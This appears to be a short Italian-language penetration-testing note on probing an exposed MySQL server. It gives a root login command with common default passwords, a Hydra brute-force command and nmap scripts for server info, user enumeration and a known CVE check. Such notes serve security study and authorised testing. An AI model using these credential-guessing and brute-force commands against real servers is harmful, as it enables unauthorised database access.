tags: MySQL Database_Esposto


Quando un server MySQL è esposto e lo rileviamo tramite nmap è buona pratica provare ad autenticarsi o con le seguenti credenziali:

mysql -h <IP_TARGET> -u root -p

Con una di queste password:

  • Password vuota (premi Invio senza scrivere nulla)

  • root

  • password

  • toor (root al contrario)

  • admin

Oppure con Hydra:

hydra -l root -P /percorso/della/tua/wordlist.txt <IP_TARGET> mysql

Possiamo anche ottenere molte informazioni tramite Nmap:

nmap -p 3306 --script mysql-info,mysql-enum,mysql-vuln-cve2012-2122 <IP_TARGET>
  • mysql-info: Tenta di ottenere informazioni dettagliate sul server.

  • mysql-enum: Tenta di enumerare utenti validi.

  • mysql-vuln-*: Controlla la presenza di vulnerabilità note (CVE).